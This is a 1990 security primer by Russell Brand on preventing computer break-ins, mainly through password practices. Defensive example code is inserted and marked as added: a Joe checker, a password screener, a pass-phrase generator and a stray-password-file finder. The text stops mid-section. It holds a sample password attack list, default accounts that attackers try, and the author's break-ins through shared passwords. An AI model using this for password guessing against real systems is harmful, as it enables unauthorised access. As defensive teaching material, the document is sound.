Coping with the Threat of Computer Security Incidents, by Russell L. Brand (June 8, 1990)

Coping with the Threat of Computer Security Incidents

A Primer from Prevention through Recovery

Russell L. Brand *

June 8, 1990

Abstract

As computer security becomes a more important issue in
modern society, it begins to warrant a systematic
approach. The vast majority of the computer security
problems and the costs associated with them can be
prevented with simple inexpensive measures. The most
important and cost effective of these measures are
available in the prevention and planning phases. These
methods are presented followed by a simplified guide to
incident handling and recovery.

* Copyright © Russell L. Brand 1989, 1990. Permission to copy
granted provided each copy includes attribution and the version
information. This permission extends for one year minus one day
from June 8, 1990; past that point, the reader should obtain a
newer copy of the article as the information will be out of date.


Contents

1 Overview 4

2 Incident Avoidance 5
  2.1 Passwords 5
    2.1.1 Joe’s 6
    2.1.2 Same Passwords on Different Machines 6
    2.1.3 Readable Password Files 7
    2.1.4 Many faces of a person 9
    2.1.5 Automated Checks for Dumb Passwords 9
    2.1.6 Machine Generated Passwords 10
    2.1.7 The Sorrows of Special Purpose Hardware 12
    2.1.8 Is Writing Passwords Down that Bad? 13
    2.1.9 The Truth about Password Aging 13
    2.1.10 How do you change a password 13
  2.2 Old Password Files 14
  2.3 Dormant Accounts 14
    2.3.1 VMS 14
  2.4 Default Accounts and Objects 14
    2.4.1 Unix 16
    2.4.2 VMS 17
    2.4.3 CMS 18
  2.5 File Protections 18
  2.6 Well Known Security Holes 19
  2.7 New Security Holes 20
    2.7.1 CERT 20
    2.7.2 ZARDOZ 21
    2.7.3 CIAC 21
  2.8 Excess Services 21
  2.9 Search Paths 21
  2.10 Routing 21
  2.11 Humans 22
    2.11.1 Managers 22
    2.11.2 Secretaries 22
    2.11.3 Trojan Horses 22
    2.11.4 Wizards 23
    2.11.5 Funders 23
  2.12 Group Accounts 23
  2.13 .rhosts and proxy logins 24
  2.14 Debugging 24
  2.15 Getting People Mad at You 24

3 Pre-Planning your Incident Handling 25
  3.1 Goals 25
    3.1.1 Maintaining and restoring data 25
    3.1.2 Maintaining and restoring service 26
    3.1.3 Figuring how it happened 26
    3.1.4 Avoiding the Future Incidents and Escalation 26
    3.1.5 Avoiding looking foolish 27
    3.1.6 Finding out who did it 27
    3.1.7 Punishing the attackers 27
  3.2 Backups 27
    3.2.1 Why We Need Back Ups 28
    3.2.2 How to form a Back Up Strategy that Works 29
  3.3 Forming a Plan 30
  3.4 Tools to have on hand 31
  3.5 Sample Scenarios to Work on in Groups 31

4 Incident Handling 33
  4.1 Basic Hints 33
    4.1.1 Panic Level 33
    4.1.2 Call Logs and Time Lines 33
    4.1.3 Accountability and Authority 33
    4.1.4 Audit Logs 33
    4.1.5 Timestamps 34
  4.2 Basic Techniques 34
    4.2.1 Differencing 34
    4.2.2 Finding 34
    4.2.3 Snooping 34
    4.2.4 Tracking 34
    4.2.5 Psychology 34
  4.3 Prosecution 35
  4.4 Exercise 35

5 Recovering From Disasters 36

A Micro Computers 36

B VMS Script 39

C Highly Sensitive Environments 42

D Handling the Press 44
  D.1 Spin Control 44
  D.2 Time Control 44
  D.3 Hero Making 44
  D.4 Discouraging or Encouraging a Next Incident 45
  D.5 Prosecution 45
  D.6 No Comment 45
  D.7 Honesty 45

E Object Code Protection 46

F The Joy of Broadcast 47

G Guest Accounts 48
  G.1 Attack Difficulty Ratios 48
  G.2 Individual Sponsors 48
  G.3 The No Guest Policy 48

H Orange Book 49

I Acknowledgements 50


1 Overview

Since 1984, I have been periodically distracted from my
education, my research and from my personal life to help handle
computer emergencies. After presenting dozens of papers,
tutorials and talks on computer security, Roger Anderson and
George Michale arranged for me to lead a one day intensive
seminar on the practical aspects of computer security in an
unclassified networked environment for IEEE Compcon. This primer
was written as a basic text for this type of seminar and has been
used for about 2 dozen of them in the past year, and is still in
draft form.

The text is divided into four main sections with a number of
appendices. The first two major sections of this document
contain the material for the morning lecture. The two following
sections contain the afternoon’s material. The remaining
appendices include material that is of interest to those people
who have to deal with other computer security issues.

Since this primer is a direct and simple “how to guide” for
cost-effective solutions to computer security problems, it does
not contain as many stories and examples as my other tutorials.
Those readers interested in these stories or who are having
difficulty convincing people in their organization of the need
for computer security are referred to Attack of the Tiger Team,
when it becomes available, and those readers interested in a
comprehensive list of computer security vulnerabilities should
contact the author regarding the Hackman project.

Suggestions, questions and other comments are always welcome.
Please send comments to primer@cert.sei.cmu.edu. I hope to
publish this set of notes in a more complete form in the
future. When sending comments or questions, please mention that
you were reading version CERT 0.6 of June 8, 1990.

Russell L. Brand
brand@lll-crg.llnl.gov
1862 Euclid Ave, Suite 136
Berkeley, CA 94709


2 Incident Avoidance

“An ounce of prevention is worth a pound of cure.” In computer
security this is an understatement by a greater factor than can
easily be believed. Very little has historically been done to
prevent computer break-ins and I have been told by a number of
the country’s top computer scientists that “Computer Security is
a waste of time.” The belief that security measures or
preventive medicine is a waste has led to giant expenditures to
repair damage to both computers and people respectively. Much to
my surprise, several system managers reviewing this document were
sure that even basic preventative measures would not be cost
effective as compared to repairing disasters after they occurred.

The vast majority of the security incidents are caused by one of
about a dozen well understood problems. By not making these
mistakes, you can prevent most of the problems from happening to
your systems and avoid untold hassles and losses. Almost every
site that I survey has at least one of these problems, and almost
every incident that did not involve insiders was caused by one of
them. In most of the insider cases, no amount of computer
security would have helped; these are in many ways problems with
physical security or personnel policy rather than with computer
security per se.

Most of the security incidents are caused by “attackers” of
limited ability and resources. Because of this and because there
are so many easy targets, if you provide the most basic level of
protection, most of the attackers will break into some other site
instead of bothering yours. There are of course exceptional
cases. If you are believed to have highly sensitive information
or are on a “hit list” of one type or another, you may
encounter more dedicated attackers. Readers interested in more
comprehensive defensive strategies should consult the appendices.

Overall, prevention of a problem is about four orders of
magnitude cheaper than handling it in the average case. Proper
planning can reduce the cost of incident handling and recovery
and is discussed in the section on planning. In addition to
whatever other measures are taken, the greatest incremental
security improvement will be obtained by implementing the simple
measures described below.


2.1 Passwords

While “good passwords” is not a hot and sexy topic and will
never command the prestige of exploitable bugs in the operating
system itself, it is the single most important topic in incident
prevention. Doing everything else entirely correctly is almost
of no value unless you get this right!

2.1.1 Joe’s

A “Joe” is an account where the username is the same as the
password. This makes the password both easy to remember and easy
to guess. It is the single most common cause of password
problems in the modern world.

In 1986, there was popular conjecture that every machine had a
Joe. There was a fair amount of random testing done and in fact a
Joe was found on each and every machine tested. These included
machines that had password systems designed to prevent usernames
from being used as passwords.

This summer, while I was testing a series of sensitive systems
where hundreds of thousands of dollars had been spent to remove
security holes, including re-writing a fair fraction of the
operating system, there were Joes.

It is worthwhile to include a process in your system batching
file (cron on unix) to check for Joes explicitly. The most
common occurrence of a Joe is the initial password that the
system administrator set for an account and which has never been
changed. Often this initial password is set by the administrator
with the expectation that the user will change it promptly. Often
the user doesn’t know how to change it or in fact never logs in
at all. In the latter case a dormant account lies on the system
accomplishing nothing except wasting system resources and
increasing vulnerabilities.
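One way to run the explicit Joe check from cron, as an added example that is not part of the paper: it re-encrypts each username under the salt of the stored hash and reports matches, together with accounts whose password field is empty. The `crypt_like` hash and the sample password lines are constructed stand-ins; on a real system the hash function is the platform's crypt(3).

```python
"""Cron-style sweep of a passwd-format file for Joes (example code, not the paper's).
Each line is user:hash:uid:gid:gecos:home:shell as in a classic /etc/passwd."""
import hashlib


def crypt_like(plain: str, salt: str) -> str:
    """Constructed stand-in for crypt(3): two-character salt prefix followed by
    11 characters derived from a salted digest. On a real system replace the
    body with a call to the platform's crypt(3); the callers only rely on the
    salt being the first two characters of the stored string."""
    salt = salt[:2]
    digest = hashlib.sha256((salt + plain).encode()).hexdigest()
    return salt + digest[:11]


def is_joe(username: str, stored_hash: str, hasher=crypt_like) -> bool:
    """True if the username (or its capitalised form, a common variant) encrypts
    to the stored hash under that hash's own salt."""
    if len(stored_hash) < 2:
        return False
    salt = stored_hash[:2]
    return any(hasher(guess, salt) == stored_hash
               for guess in (username, username.capitalize()))


def find_joes(passwd_text: str, hasher=crypt_like) -> list:
    """Return (username, reason) pairs for every Joe and for every account whose
    password field is empty, i.e. which needs no password at all."""
    findings = []
    for line in passwd_text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 2:
            continue
        user, stored = fields[0], fields[1]
        if stored == "":
            findings.append((user, "empty password field"))
        elif is_joe(user, stored, hasher):
            findings.append((user, "password equals username"))
    return findings


def make_entry(user: str, password: str, uid: int, gecos: str, salt: str) -> str:
    """Build one constructed passwd line with the stand-in hash."""
    return f"{user}:{crypt_like(password, salt)}:{uid}:100:{gecos}:/home/{user}:/bin/sh"


# Constructed sample file: two Joes, one passwordless account, two other accounts.
SAMPLE_PASSWD = "\n".join([
    make_entry("alice", "rx7!Hollow", 1001, "Alice Example", "ab"),
    make_entry("bob", "bob", 1002, "Bob Example", "cd"),          # a Joe
    make_entry("carol", "Carol", 1003, "Carol Example", "ef"),    # capitalised Joe
    "guest::1004:100:Guest Account:/home/guest:/bin/sh",          # no password set
    make_entry("dave", "dave1", 1005, "Dave Example", "gh"),      # weak, but not a Joe
])

if __name__ == "__main__":
    for user, reason in find_joes(SAMPLE_PASSWD):
        print(f"{user}: {reason}")
```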

2.1.2 Same Passwords on Different Machines

Many years ago when a computing center had a single mainframe the
issue of a user having the same password on multiple machines was
moot. As long as the number of machines that a user accessed was
very small, it was reasonable to request that a person use a
different password on each machine or set of machines. With a
modern workstation environment, it is no longer practical to
expect this from a user and a user is unlikely to comply if
asked. There are a number of simple compromise measures that can
and should be taken.

Among these measures is requesting that privileged users have
different passwords for their privileged accounts than for their
normal use account and for their accounts on machines at other
centers. If the latter is not the case, then anyone who gains
control of one of these “other” machines which you have no
control over, has gained privileged access to yours as well.

The basic question of when passwords should be the same is
actually a simple one. Passwords should be the same when the two
machines (1) are logically equivalent (as in a pool of
workstations), (2) “trust each other” to the extent that
compromising one would compromise the others in other ways, or
(3) are run by the same center with the same security measures.
Passwords should be different when the computers (1) are run by
different organizations, (2) have different levels of security or
(3) have different operating systems.

Lest this seem too strict, be assured that I have on several
occasions broken into machines by giving privileged users on the
target machines accounts on one of my own and exploiting their
use of the same password on both. Further, machines with
different operating systems are inherently vulnerable to
different “programming bugs” and hence by having the same
passwords on the two machines, each machine is open to all the
bugs that could exist on either system.

It is interesting (but of little practical value) to note that an
attacker can gain a cryptographic advantage by having two
different encrypted strings for the same password. This would
happen when the user has the same password on two machines but it
has been encrypted with different salts. In principle, this
makes hostile decryption much easier. In practice, the attack
methods that are most often used do not exploit this.

The worst offenders of the “shared password problem” are
network maintenance people and teams. Often they want an account
on every local area net that they service, each with the same
password. That way they can examine network problems and such
without having to look up hundreds of passwords.

While the network maintainers are generally (but not always) good
about picking reasonable passwords and keeping them secret, if
any one machine that they are using has a readable password file
(discussed below) or is ever compromised, this password is itself
compromised and an attacker can gain unauthorized access to
hundreds or thousands of machines.

2.1.3 Readable Password Files

A readable password file is an accident waiting to happen. With
access to the encrypted password an attacker can guess passwords
at his leisure without you being able to tell that he is doing
so. Once he has a correct password, he can then access your
machine as that user. In the case of certain operating systems,
including older versions of VMS, there is a well known inversion
for the password encryption algorithm and hence the attacker
doesn’t need to guess at all once he can read the password file.

Changing the encryption method to some other method that is also
publically known doesn’t help this set of problems, even if the
crypto-system itself is much stronger. The weakness here is not
in the crypto-system but rather in the ease of making guesses.

It is vital to protect your password file from being read. There
are two parts to this. First you should prevent anonymous file
transfers from being able to retrieve a copy of the password
file. While this is generally very easy to do correctly, there is
a common mistake worth avoiding. Most file transfer facilities
allow you to restrict the part of the file system from which
unauthenticated transfers can be made. It is necessary to put a
partial password file in this subsection so that an anonymous
agent knows “who it (itself) is”. Many sites have put complete
password files here, defeating one of the most important purposes
of the restrictions. (Of course without this restriction “World
Readable” takes on a very literal meaning...)

The second part of the solution is somewhat harder. This is to
prevent unprivileged users who are using the system from reading
the encrypted password from the password file. The reason that
this is difficult is that the password file has a great deal of
information that people and programs need in it other than the
passwords themselves. Some versions of some operating systems
have privileged calls to handle the details of all this and hence
their utilities have already been written to allow protection of
the encrypted passwords.

Most of the current versions of Unix are not among these
systems. Berkeley has distributed a set of patches to
incorporate this separation (called shadow passwords) and the
latest version of SunOS has facilities for it. For those who
are using an operating system that does not yet have shadow
passwords and cannot use one of the new releases, a number of ad
hoc shadowing systems have been developed. One can install
shadow passwords by editing the binaries of /bin/login,
/bin/passwd and similar programs that actually need to use the
password fields and then modifying /etc/vipw to work with both
the diminished and shadow password files.

Of course, since most of us use broadcast nets, there is a real
danger of passwords being seen as they go over the wire. This
class of problems is discussed in the Joy of Broadcast appendix
and the Guest Accounts appendix.

Kerberos, developed at MIT’s Athena project, has an alternative
means of handling passwords. It allows one to remove all the
passwords from the normal use machines and to never have them
broadcast in clear text. While Kerberos is vulnerable to a
number of interesting password guessing and cryptographic attacks
and currently has problems with multi-homed machines (hosts with
more than one IP address), it does provide the first practical
attempt at network security for a university environment.

An often overlooked issue is that of passwords for games. Many
multiplayer computer games, such as “Xtrek” and “Empire”,
require the user to supply a password to prevent users from
impersonating one another during the game. Generally these
passwords are stored by the game itself and are in principle
unrelated to the passwords that the operating system itself uses.
Unfortunately, these passwords are generally stored unencrypted
and some users use the same password as they do for logging into
the machine itself. Some games now explicitly warn the user not
to use his login password. Perhaps these games will eventually
check that the password is indeed not the same as the login
password.

2.1.4 Many faces of a person

A single individual can have many different relationships to a
computer at different times. The system programmers are acting
as “just users” when they read their mail or play a computer
game. In many operating systems, a person gets all of his
privileges all of the time. While this is not true in Multics,
it is true in the default configuration of almost every other
operating system. Fortunately a computer doesn’t know anything
about “people” and hence is perfectly happy to allow a single
person to have several accounts with different passwords at
different privilege levels. This helps to prevent the
accidental disclosure of a privileged password. In the case
where the privileged user’s unprivileged account has the same
password as his unprivileged accounts on other machines, it will
at least be the case that his privileges are not compromised
when and if one of these other machines is compromised.

The one case where it is especially important to have separate
accounts or passwords for a single individual is for someone who
travels to give demos. One can be assured that his password will
be lost when he is giving a demo and something breaks. The most
common form of “breakage” is a problem with duplex or delay.
It would be nice if all that was lost was the demo password and
for the demo password to be of no use to an attacker.

2.1.5 Automated Checks for Dumb Passwords

Automated checks for dumb passwords come in three varieties. The
first is to routinely run a password cracker against the
encrypted passwords and notice what is caught. While this is a
good idea, it is currently used without either of the other two
mechanisms we will describe. Since it is computationally less
efficient than the others by about a factor of 50,000, it should
be used to supplement the others rather than be used exclusively.
Among its many virtues is that an automated checking system that
reads the encrypted passwords does not require having source for
the operating system or making any system modifications.

The second method of preventing dumb passwords is to alter the
password changing facility so that it doesn’t accept dumb
passwords. This has two big advantages over the first method.
The first of these is computational. The second is more
important. By preventing the user from selecting the poor
password to begin with, one doesn’t need an administrative
procedure to get him to change it later. It can all happen
directly with no human intervention and no apparent
accountability. As a general rule, people are not happy about
passwords and really don’t want to hear from another person that
they need to change their password yet again.

While this change does require a system modification, it can
often be done without source code by writing a pre-processor to
screen the passwords before the new password is passed to the
existing utilities. The weakness in this approach lies with the
users who are not required to use the new style of password
facility. As a result, one finds that facilities that use only
this method have good passwords for everyone except the system
staff and new users who have had their initial passwords set by
the system staff.

The third method is designed primarily to catch the bad passwords
that are entered despite the use of the second method. One
could check the “dumbness” of a password with each attempted
use. While this is computationally more expensive than the
second method, it generally catches everyone. Even the system
programmers tend to use the standard login utility. It has the
nice feature of locking out anyone that finds a way to circumvent
the second method. This generally requires a small amount of
system source and risks causing embarrassment to “too clever”
system staff members.

In terms of dumb passwords, there are a number of “attack
lists”. An attack list is a list of common passwords that an
attacker could use to try to login with. Several of these have
been published and more are constantly being formed. These lists
are used for the automated password guesser and they may also be
used directly in the second and third method described above.
With the second and third method one may also use criteria
including minimum length, use of non-alphabetic characters, etc.
Finally, information about the individual user found in standard
system files can be scanned to see if the user has incorporated
this information into his password.
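A pre-processor of the kind the second method describes, written here as an added example (not the paper's own code): it screens a candidate password against the username, a short constructed attack list, a minimum length, the all-alphabetic rule and words taken from the account's GECOS field (the standard system file the text refers to). Trailing-digit stripping is a small extension of what the text lists; the same function can be called from the login path to implement the third method.

```python
"""Screen a candidate password before it reaches the passwd utility (example code,
not the paper's). An empty result means the password is acceptable."""
import re

# Constructed, deliberately short attack list; published ones run to thousands of words.
ATTACK_LIST = {"password", "secret", "letmein", "qwerty", "welcome",
               "12345678", "changeme"}


def user_derived_words(username: str, gecos: str) -> set:
    """Words an attacker would try from the account itself: the username and every
    token of three or more characters in the GECOS field (name, office, phone)."""
    words = {username.lower()}
    for token in re.split(r"[^A-Za-z0-9]+", gecos):
        if len(token) >= 3:
            words.add(token.lower())
    return words


def screen_password(candidate: str, username: str, gecos: str = "",
                    attack_list=ATTACK_LIST, min_len: int = 8) -> list:
    """Return every reason the candidate fails; an empty list means accept.
    Comparisons are case-insensitive and ignore trailing digits, since
    'Secret1' is still 'secret' to a cracker (an extension of the text's list)."""
    reasons = []
    low = candidate.lower()
    stripped = low.rstrip("0123456789")
    if len(candidate) < min_len:
        reasons.append(f"shorter than {min_len} characters")
    if candidate.isalpha():
        reasons.append("contains only letters")
    if low == username.lower():
        reasons.append("password equals username (a Joe)")
    if low in attack_list or stripped in attack_list:
        reasons.append("appears in attack list")
    # Account-derived words, forwards and reversed.
    for word in sorted(user_derived_words(username, gecos)):
        if stripped in (word, word[::-1]):
            reasons.append(f"derived from account information ({word})")
            break
    return reasons


if __name__ == "__main__":
    # Constructed demonstration inputs.
    for pw in ("bob", "Password1", "Example42", "Rx7!hollow-tree"):
        verdict = screen_password(pw, "bob", "Bob Example,Room 4,555-0100")
        print(f"{pw!r}: {'accepted' if not verdict else '; '.join(verdict)}")
```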

2.1.6 Machine Generated Passwords

Most users hate machine generated passwords. Often they are
unrememberable and accompanied by a warning to “Never write them
down” which is a frustrating combination. (We will discuss the
writing down of passwords later.) Machine generated passwords
come in four basic types:

Gibberish. This is the most obvious approach to randomness.
Independently select several characters from the set of
all printable characters. For a six character password,
this gives about 40 bits of randomness. It is very hard to
guess and perhaps even harder to remember.
Often a little bit of post processing is done on these
passwords as well as on the random syllables discussed
below. This post processing removes passwords that might
prove offensive to the user. When a potentially offensive
password is generated, the program simply tries again. The
user often behaves the same way and runs the randomizer over
and over again until a password that seems less random and
more memorable to him is selected. In principle, the clever
user could write a program that kept requesting new random
passwords until an English word was chosen for him; this
would take much too long to be practical.

Numbers. Numbers are a lot like letters. People don’t try to
pronounce them and there are very few numbers that are
“offensive” per se. An eight digit random number has
about 26 bits of randomness in it and is of comparable
strength to a 4 character random password chosen from the
unrestricted set of printable characters. (The amount of
randomness in a password is the log (base 2) of the number
of possible passwords if they were all equally likely to
occur.)
Eight digit numbers are hard to remember. Fortunately
“chunking” them into groups (as 184—25—7546) makes
this less difficult than it would otherwise be.

Syllables. This is by far the most common method currently used.
The idea is to make non-words that are easy to remember
because they sound like words. A three syllable, eight
letter non-word often has about 24 bits of randomness in it
making it not quite as strong as an eight digit number but
hopefully a little bit more memorable.
The principle here is good. In fact, this pseudo-word idea
should work very well. In practice it fails miserably
because the standard programs for generating these
pseudo-syllables are very poor. Eventually we may find a
good implementation of this and see a higher level of user
acceptance.

Pass Phrases. Pass phrases are the least common way to implement
machine generated passwords. The idea here is very simple.
Take 100 nouns, 100 verbs, 100 adjectives and 100 adverbs.
Generate an eight digit random number. Consider it as four
2 digit random numbers and use that to pick one of each of
the above parts of speech. The user is then given a phrase
like “Orange Cars Sleep Quickly.” The words within each
list are uniquely determined by their first two characters.
The user may then type the phrase, the first few letters of
each word or the eight digit number.
The phrases are easy to remember, the system remains just as
secure if you publish the list of words and has about 26
bits of randomness. One can adapt the system down to three
words with 20 bits of randomness and still be sufficiently
safe for most applications.
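The pass-phrase scheme above as an added example (not from the paper): the four two-digit groups of the number pick one word each from the adjective, noun, verb and adverb lists, and a login is accepted on the phrase, on two-letter (or longer) prefixes of its words, or on the number itself. The word lists here are constructed five-word placeholders; `bits_of_randomness` reproduces the 26 and 20 bit figures when given 100-word lists.

```python
"""Pass-phrase passwords: an eight digit number read as four two-digit indices
into four word lists (example code, not the paper's implementation)."""
import math
import secrets

# Constructed five-word placeholder lists; a real deployment uses 100 words per list.
# Every word in a list must differ in its first two letters (see check_word_lists).
ADJECTIVES = ["orange", "silent", "brave", "tiny", "wet"]
NOUNS = ["cars", "lamps", "rivers", "doors", "hats"]
VERBS = ["sleep", "dance", "fly", "grow", "hum"]
ADVERBS = ["quickly", "softly", "never", "badly", "twice"]
WORD_LISTS = [ADJECTIVES, NOUNS, VERBS, ADVERBS]


def check_word_lists(lists) -> None:
    """Enforce the two structural rules of the scheme: a two-digit index needs at
    most 100 words, and the two-letter abbreviation must identify a unique word."""
    for words in lists:
        if not 0 < len(words) <= 100:
            raise ValueError("each list needs between 1 and 100 words")
        prefixes = [w[:2].lower() for w in words]
        if len(set(prefixes)) != len(prefixes):
            raise ValueError("two words in one list share their first two letters")


def bits_of_randomness(lists) -> float:
    """log2 of the number of equally likely phrases: 26.6 for four 100-word lists,
    19.9 for three, and far less for the placeholder lists above."""
    return math.log2(math.prod(len(words) for words in lists))


def generate_passphrase(lists=WORD_LISTS, randbelow=secrets.randbelow):
    """Return (number, words): the stored digit string and the phrase it encodes."""
    check_word_lists(lists)
    indices = [randbelow(len(words)) for words in lists]
    number = "".join(f"{i:02d}" for i in indices)
    return number, [words[i] for words, i in zip(lists, indices)]


def words_from_number(number: str, lists=WORD_LISTS):
    """Decode a digit string; None if it is malformed or indexes past a list."""
    if len(number) != 2 * len(lists) or not number.isdigit():
        return None
    words = []
    for k, lst in enumerate(lists):
        idx = int(number[2 * k:2 * k + 2])
        if idx >= len(lst):
            return None
        words.append(lst[idx])
    return words


def verify(entered: str, number: str, lists=WORD_LISTS) -> bool:
    """Accept the number, the whole phrase, or a prefix of at least two letters of
    each word; a run of bare two-letter prefixes ('orcaslqu') is accepted too."""
    expected = words_from_number(number, lists)
    if expected is None:
        return False
    entered = entered.strip().lower()
    if entered == number:
        return True
    tokens = [t.strip(".,!?") for t in entered.split()]
    if len(tokens) == 1 and len(tokens[0]) == 2 * len(expected):
        tokens = [tokens[0][i:i + 2] for i in range(0, len(tokens[0]), 2)]
    if len(tokens) != len(expected):
        return False
    return all(len(t) >= 2 and w.startswith(t) for t, w in zip(tokens, expected))


if __name__ == "__main__":
    number, words = generate_passphrase()
    print(number, " ".join(w.capitalize() for w in words))
    print(f"{bits_of_randomness(WORD_LISTS):.1f} bits with the placeholder lists")
```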

I believe that machine generated passwords are generally a bad
solution to the password problem. If you must use them, I
strongly urge the use of pass-phrases over the other methods. In
any event, if your center is using machine generated passwords,
you should consider running an occasional sweep over the entire
user file system looking for scripts containing these passwords.
Proper selection of your password generation algorithm can make
this much easier than it sounds.

As with almost all password issues, the user of a single computer
center which gives him one machine generated password for access
to all the machines he will use will not have nearly the level of
difficulty as the user who uses computers at many centers and
might have to remember dozens or even hundreds of such passwords.

2.1.7 The Sorrows of Special Purpose Hardware

With the problems of broadcast networks and users selecting bad
passwords or rebelling at machine generated passwords, some
facilities have turned to special purpose hardware that generates
keys dynamically. Generally these devices look like small
calculators (or smart cards) and when a user enters a short
password (often four digits) they give him a password that is
good for a single use. If the person wants to login again, he
must get a new password from his key-generator.

With a few exceptions, the technology of these devices works very
well. The exceptions include systems with bad time
synchronization, unreliable or fragile hardware or very short
generated keys. In at least one case the generated keys were so
short that it was faster to attack the machine by guessing the
password “1111” than by guessing at the user generated
passwords it replaced.

Despite the technology of these devices working well and the
installation generally being almost painless, there are two
serious problems with their use. The first is cost. Buying a
device for each user of a large center can easily cost more than
an additional mainframe. The second problem is more serious. This
is one of user reluctance. Most users are unwilling to carry an
extra device and the people who are users of many centers are
even less willing to hold a dozen such devices and remember which
is which.


In one center, these devices were used only for privileged
accesses initiated from insecure locations. Only a handful of
them had to be made. (Being innovative, the center staff built
them from old programmable calculators.) They were used only by
the “on call” system programmer when handling emergencies and
provided some security without being too obtrusive.

2.1.8 Is Writing Passwords Down that Bad?

One of the first things that we were all told when we began using
timesharing is that one should never write down passwords. I
agree that users should not record their passwords on-line.
There have been a large number of break-ins enabled by a user
having a batch script that included a clear-text password to
let him login to another machine.

On the other hand, how often has your wallet been stolen? I
believe that a password written down in a wallet is probably not
a serious risk in comparison to the other problems, including the
selection of “dumb” passwords that are easier to remember. In
classified systems, this is, of course, not permitted.

2.1.9 The Truth about Password Aging

Some facilities force users to change their passwords on a
regular basis. This has the beneficial side effect of removing
dormant accounts. It is also the case that it limits the utility
of a stolen password.

While these are good and worthwhile effects, most system
administrators believe that changing passwords on a regular basis
makes it harder for an attacker to guess them. In practice, an
attacker who has gotten the crypt text of the password file
generally needs only a few hours to find the passwords of
interest and hence frequent changes do not increase the
difficulty of his task. For the attacker who is guessing without
a copy of the encrypted password, even changing the password
every minute would at most double the effort he would be required
to expend.


2.1.10 How do you change a password

Users should be told to change their passwords whenever they have
reason to expect that another person has learned their passwords
and after each use of an “untrusted” machine. Unfortunately
many users are neither told this, nor how to change the password.
Be sure both to tell your users how to change their passwords and
to include these instructions in the on-line documentation in an
obvious place. Users should not be expected to realize that
password changing is (1) an option for directory maintenance
under TOPS-20 and many versions of CMS, (2) is spelled passwd
under unix or (3) is an option to set under VMS.

2.2 Old Password Files

It is often the case at sites running shadow password systems
that someone forgets to prevent the shadow password file from
being publicly readable. While this is easy to prevent by having
a batch job that routinely revokes read permissions that were
accidentally granted, there is an interesting variant of this
problem that is harder to prevent.

When password files are edited, some editors leave backup files
that are publically readable. In fact when a new system is
installed a password file is often created by extracting
information from the password files of many existing systems.
The collection of password files is all too often left publically
readable in some forgotten disk area where it is found by an
attacker weeks or months later. The attacker then uses this data
to break into a large number of machines.
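An added example, not code from the paper, of the batch job this section calls for: a Bourne shell script that walks a tree looking for forgotten copies of password files that anyone can read. It applies two independent tests, one on the file name and one on the content, so a stray copy given an innocuous name is still caught. The name patterns, the hash strings and the directory layout of the constructed fixture are assumptions made for the example.

```sh
#!/bin/sh
# Added example, not from the paper.  Report world-readable files that are
# forgotten copies of password files.  Two independent tests:
#   name     the file is named like a backup or variant of passwd/shadow
#            (passwd~, #passwd#, passwd.bak, passwd.hostb, shadow-, ...);
#            the live /etc/passwd and the passwd binary do not match.
#   content  every non-blank line has the seven colon-separated fields of
#            the passwd format and at least one second field looks like a
#            hash: eight or more characters, not a lock marker ("*", "!").
#            The live passwd with "x" placeholders fails this test; a
#            pre-shadow copy carrying real hashes passes it.

# Exit 0 if the content of file $1 looks like a password file with hashes.
looks_like_hashed_passwd() {
    awk -F: '
        NF == 0 { next }                                # blank line
        NF != 7 { bad = 1; exit }                       # not passwd format
        length($2) >= 8 && $2 !~ /^[*!]/ { hashes++ }
        END { exit !(bad == 0 && hashes > 0) }' "$1"
}

# Print "<reason><TAB><path>" for every world-readable regular file under
# $1 (-perm -0004: the "other read" bit is set) matching either test.
find_stray_passwd_files() {
    find "$1" -type f -perm -0004 2>/dev/null | sort | while read -r f; do
        reason=
        case "${f##*/}" in
            *passwd*~|*shadow*~|\#*passwd*|\#*shadow*|*passwd.*|*shadow.*|*passwd-*|*shadow-*)
                reason=name ;;
        esac
        if looks_like_hashed_passwd "$f"; then
            reason="${reason:+$reason+}content"
        fi
        if [ -n "$reason" ]; then
            printf '%s\t%s\n' "$reason" "$f"
        fi
    done
}

# Constructed fixture (not real data): the live passwd with "x"
# placeholders, a correctly protected shadow file and an editor backup of
# it, a merge directory left over from a system installation holding
# another host's pre-shadow passwd and a plain-named file of passwd lines,
# and an unrelated colon-separated file.  The hashes are arbitrary strings.
make_sample_tree() {
    mkdir -p "$1/etc" "$1/home/oldadmin/merge" "$1/tmp"
    printf 'root:x:0:0:root:/:/bin/sh\nalice:x:100:100:Alice:/home/alice:/bin/sh\n' \
        > "$1/etc/passwd"
    printf 'root:abJnggxhB/yWI:10000:0:99999:7:::\n' > "$1/etc/shadow"
    printf 'root:abJnggxhB/yWI:10000:0:99999:7:::\n' > "$1/etc/shadow~"
    printf 'root:abJnggxhB/yWI:0:0:root:/:/bin/sh\nbob:xyRVYQpJ8s2yM:101:101:Bob:/home/bob:/bin/csh\n' \
        > "$1/home/oldadmin/merge/passwd.hostb"
    printf 'carol:9sLvHnVm3qP2E:102:102:Carol:/home/carol:/bin/sh\n' \
        > "$1/home/oldadmin/merge/hostc.txt"
    printf 'a:b:c\n' > "$1/tmp/notes"
    chmod 600 "$1/etc/shadow"
    chmod 644 "$1/etc/passwd" "$1/etc/shadow~" "$1/tmp/notes" \
        "$1/home/oldadmin/merge/passwd.hostb" "$1/home/oldadmin/merge/hostc.txt"
}

root=$(mktemp -d)
make_sample_tree "$root"
find_stray_passwd_files "$root"   # shadow~ by name, hostc.txt by content, passwd.hostb by both
rm -rf "$root"
```

Run it over the places where people actually work (home directories, scratch disks, the area a new system was merged in), not over /etc alone; the copy that hurts is the one nobody remembers. On a system without shadow passwords the live /etc/passwd will pass the content test too, which is the readable password file problem rather than a stray copy.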

2.3 Dormant Accounts

While requiring annual password changes does eventually remove
dormant accounts, it is worthwhile to take a more active approach
to their removal. The exact nature of this approach will vary
from center to center.

2.3.1 VMS

In VMS, the account expiration field is a good method of retiring
dormant accounts, but care should be taken, as no advance notice
is given to the user that an account is near expiration.

Also, VMS security auditing makes the outright removal of expired
users a bad idea. Because one of the most common errors is typing
the password on the username line, DEC suppresses invalid
usernames from the logs until a break-in attempt is detected. But
if the username is valid and the password wrong, the username is
logged. An expired account that is left in place therefore shows
up in the audit trail when someone tries it; a deleted one does
not.

2.4 Default Accounts and Objects

One of the joys of many operating systems is that they come
complete with pre-built accounts and other objects. Many
operating systems ship with accounts or pre-login facilities
enabled that present security risks.

The standard “accounts” for an attacker to try on any system
include the following:

Open. A facility to automatically create new accounts. It is
often configured by default to require neither a password nor
system manager approval to create the new accounts.

Help. Sometimes the pre-login help is too helpful. It may
provide phone numbers or other information that you wouldn’t
